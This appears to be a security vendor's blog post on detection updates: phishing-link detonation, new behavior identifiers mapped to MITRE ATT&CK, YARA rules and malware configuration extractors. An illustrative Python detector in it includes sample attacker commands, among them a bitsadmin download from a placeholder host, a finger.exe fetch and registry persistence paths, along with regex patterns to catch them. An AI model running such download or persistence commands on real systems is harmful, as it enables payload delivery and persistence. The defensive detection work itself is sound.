Detection & Signature updates

May 02nd 2023


Introduction

With this article, we are starting a new series of posts covering the latest signature and detection changes.

Constant research into the threat landscape is vital to the VMRay products – DeepResponse, FinalVerdict and TotalInsight – as it allows us to react to the latest malware developments and address new threats. In recent times, the VMRay Labs team has focused on:

  • Addressing new phishing campaigns
  • Adding new VMRay Threat Identifiers (VTIs)
  • Extending the built-in YARA rulesets
  • Updating the malware configuration extractors

Now, let’s dive into each topic in more detail.

Beating the Tricky Phishing Campaigns

Malicious Adobe Acrobat Sign URLs

In recent months, we have observed more and more phishing attacks that are delivered through URLs.

One of them attempts to trick the user into clicking a URL in an Adobe Acrobat Sign document, a source its recipients often trust. To address this threat, we improved the logic of the Smart Link Detonation feature, which automatically evaluates and detonates hyperlinks in document and email samples.

The URL detonation is implemented in our Automatic User Interaction (Auto UI) engine. Auto UI simulates user actions during Dynamic Analysis, enabling comprehensive detonation of samples.

The Adobe Acrobat Sign sample shown below contains a picture that links to a phishing HTML file hosted on mediafire.com. With the Smart Link Detonation improvements, the VMRay Platform successfully follows the Adobe Acrobat Sign URL and detects the phishing attempt.

Scams Using Audio Voicemail Links 

After discovering another campaign that entices users to click a link to play an audio message, which led to a phishing page that went undetected, we improved the behavior of Adaptive Browsing Simulation. This feature of Dynamic Web Analysis automatically detects and clicks user interface buttons to trigger payload delivery and flush out phishing attacks that require user clicks in the browser.

Now, such audio message links are clicked, and the phishing pages are correctly detected.

VMRay’s New Threat Identifiers

Let’s start with a quick recap of what VTIs are: VTIs are a collection of malware behaviors observed during analysis that are used to evaluate samples and contribute to the final determination of a Verdict.

For example, ‘Reads ssh keys’ is a VTI in the Data Collection VTI Category. VTIs flag threatening or unusual behavior and rate its maliciousness on a scale of 1 to 5, with 5 being the most malicious. The VMRay products present each VTI, together with its score, on the analyzed sample’s overview.

These are some of the VTIs from a broader changelog that we added to address the latest threats:


VTI Operation Description: Detect using BITS to download files
VTI Category: Network Connection
MITRE ATT&CK® ID: T1197 [legacy: T1197, T1105]
Why it’s important: BITS (Background Intelligent Transfer Service) jobs can be exploited by adversaries to establish persistence and carry out covert background activities on a compromised system. BITS jobs consist of a queue that contains one or more file transfer tasks, making them an attractive target for malicious actors seeking to evade detection while conducting surreptitious activities.

VTI Operation Description: Detect file download attempts with finger.exe
VTI Category: Network Connection
MITRE ATT&CK® ID: T1105 [legacy: T1105]
Why it’s important: Adversaries may abuse legitimate command-line tools like finger.exe to stealthily download and execute malicious payloads from cloud storage and file-sharing services, allowing them to bypass security controls and evade detection.

VTI Operation Description: Detect privilege escalation using AppInit Dlls
VTI Category: Privilege Escalation
MITRE ATT&CK® ID: T1546.010 [legacy: T1103]

VTI Operation Description: Detect privilege escalation using AppCert Dlls
VTI Category: Privilege Escalation
MITRE ATT&CK® ID: T1546.009 [legacy: T1182]

Why it’s important (AppInit and AppCert Dlls): Malicious actors can achieve persistence and elevate privileges by running malicious code that is triggered by these DLLs being loaded into processes, thereby exploiting a Windows operating system feature to evade detection.

VTI Operation Description: Detect persistence using SilentProcessExit monitor
VTI Category: Privilege Escalation
MITRE ATT&CK® ID: T1546.012 [legacy: T1183]
Why it’s important: Attackers use this technique to evade detection and remain on a compromised system for extended periods of time. The technique involves running malicious code as a process that silently exits when no longer needed, making it difficult to detect using traditional process monitoring methods.

VTI Operation Description: Detect application shimming
VTI Category: Privilege Escalation
MITRE ATT&CK® ID: T1546.011 [legacy: T1138]
Why it’s important: Shimming involves the use of third-party software to modify application behavior, often for compatibility reasons, but attackers can abuse this technique to inject malicious code into legitimate processes to gain elevated privileges and evade detection.

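As an added illustration (not VMRay's code and not the actual VTI implementation), the following Python sketches how VTIs like those in the changelog above can be expressed as rules over process and registry telemetry: each hit carries the VTI name, its ATT&CK ID and a score on the 1-to-5 scale, and the highest score drives the overall rating. The sample events, the registry paths and command-line patterns chosen as evidence, and the scores are all assumptions made for this example.

```python
import re

# Constructed endpoint telemetry in a simplified Sysmon-like shape (not real VMRay
# output): (event_type, image, detail). For "process" events detail is the command
# line; for "registry" events it is the value path being written.
SAMPLE_EVENTS = [
    ("process", r"C:\Windows\System32\bitsadmin.exe",
     r"bitsadmin /transfer job /download /priority normal http://example.invalid/x.bin C:\Users\Public\x.bin"),
    ("process", r"C:\Windows\System32\finger.exe", "finger user@example.invalid"),
    ("registry", r"C:\Users\Public\stage.exe",
     r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs"),
    ("registry", r"C:\Users\Public\stage.exe",
     r"HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDlls\evil"),
    ("registry", r"C:\Users\Public\stage.exe",
     r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe\MonitorProcess"),
    ("process", r"C:\Windows\System32\sdbinst.exe", r"sdbinst.exe -q C:\Users\Public\fix.sdb"),
    ("process", r"C:\Windows\System32\notepad.exe", "notepad.exe readme.txt"),  # benign control
]

# One rule per VTI from the changelog above:
# (vti_name, vti_category, attack_id, score, event_type, evidence_pattern).
# Scores use the 1..5 scale (5 = most malicious) but the values are assumed, not VMRay's.
RULES = [
    ("Detect using BITS to download files", "Network Connection", "T1197", 3, "process",
     re.compile(r"bitsadmin(\.exe)?\b.*?/(transfer|addfile)\b|Start-BitsTransfer", re.I)),
    ("Detect file download attempts with finger.exe", "Network Connection", "T1105", 3, "process",
     re.compile(r"\bfinger(\.exe)?\b.*\S+@\S+", re.I)),
    ("Detect privilege escalation using AppInit Dlls", "Privilege Escalation", "T1546.010", 4, "registry",
     re.compile(r"\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs$", re.I)),
    ("Detect privilege escalation using AppCert Dlls", "Privilege Escalation", "T1546.009", 4, "registry",
     re.compile(r"\\Session Manager\\AppCertDlls(\\|$)", re.I)),
    ("Detect persistence using SilentProcessExit monitor", "Privilege Escalation", "T1546.012", 4, "registry",
     re.compile(r"\\CurrentVersion\\SilentProcessExit\\", re.I)),
    ("Detect application shimming", "Privilege Escalation", "T1546.011", 4, "process",
     re.compile(r"\bsdbinst(\.exe)?\b", re.I)),
]

def evaluate(events):
    """Return one (vti_name, attack_id, score) tuple per VTI that fires on the events."""
    hits = []
    for event_type, image, detail in events:
        subject = f"{image} {detail}" if event_type == "process" else detail
        for name, _category, attack_id, score, rule_type, pattern in RULES:
            if rule_type == event_type and pattern.search(subject):
                hits.append((name, attack_id, score))
    return hits

def verdict_score(hits):
    """Highest VTI score seen (0 when none fired); the most severe behavior drives the rating."""
    return max((score for _, _, score in hits), default=0)
```

Running `evaluate(SAMPLE_EVENTS)` fires all six VTIs exactly once and leaves the benign notepad event untouched, so the overall rating is 4.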

Fresh Built-in YARA Rulesets

YARA is an open source tool that helps malware researchers identify and classify malware by family based on known binary patterns and strings. YARA works by ingesting rules and applying them against various elements of the analysis (such as files and registry keys) to flag potentially malicious files and processes.

VMRay products contain several hundred built-in YARA rules, and that list keeps growing. To strengthen detection efficacy, our Threat Analysts made the following updates:

Extended YARA coverage for:


Improved YARA rules for:

  • Cobalt Strike
  • BumbleBee Loader
  • GuLoader Shellcode
  • RecordBreaker Stealer
  • RedLine Stealer


On the Lookout for Commodity Malware Families

Recently we released version 2023.2.0 of our Platform, which we happily shared in this post. However, we cannot forget that malware developers are also improving their tools and adding new features to attack with greater power.

Our Labs team analyzes and tracks the latest malware developments in various ways, including malware configuration extractors. But what are malware configurations? Each malware sample has an embedded configuration that tells the sample what to execute, how to infect the system, how to exfiltrate data, which evasion methods are enabled, and anything else the malware developer implemented.

Find a list of recently updated configuration extractors, with some technical details, below:

Malware Family: Aurora Stealer
Update Reason: The number of Aurora Stealer samples started to rise considerably at the end of 2022 and the beginning of 2023. Furthermore, it was recently distributed via malicious Google Ads, which makes it a dangerous threat.

Malware Family: PrivateLoader
Update Reason: PrivateLoader samples were used very frequently in 2022. As loaders are the main entry point for deploying further malicious payloads, it is very important to cover them via configuration extraction and generate high-quality Indicators of Compromise (IOCs) which can be used to hunt as well as to protect environments.


Improved configuration extractors for:

Malware Family: Agent Tesla
Update Reason: Adjusted the logic used to locate the embedded configuration when the SMTP-based exfiltration method is used.

Malware Family: BumbleBee
Update Reason: Improved the configuration extractor to support extraction from samples and not only from memory dumps. We also fixed C2 extraction to only add valid entries.

Malware Family: Cobalt Strike
Update Reason: Improved the configuration extractor to extract more elements from the embedded configuration.

Malware Family: Emotet
Update Reason: Fixed C2 extraction, which now decides whether a C2 address is a valid or a fake entry. Additionally, extraction has been adjusted so that this information also appears in the configuration as well as in the IOCs and artifacts.

Malware Family: RecordBreaker
Update Reason: Improved the configuration extractor to cover more samples by adjusting the internal logic used to locate and extract the configuration.

Malware Family: RedLine
Update Reason: Improved the configuration extractor to cover more samples by adjusting the internal logic used to locate the embedded configuration.

Malware Family: Snake Keylogger
Update Reason: Adjusted the configuration extractor to also support samples that have an encrypted configuration.

Malware Family: Warzone
Update Reason: Adjusted the configuration extractor to support samples with RC4+ encrypted configurations.

Malware Family: XLoader
Update Reason: Adjusted the configuration extractor to also cover XLoader samples of version 2.8.


Izabela Komorowska

Technical Writer with over 8 years of experience in various tech companies ranging from small startups to large SaaS enterprises. Enthusiastic about writing easy-to-understand customer documentation that clarifies a product’s features and benefits.
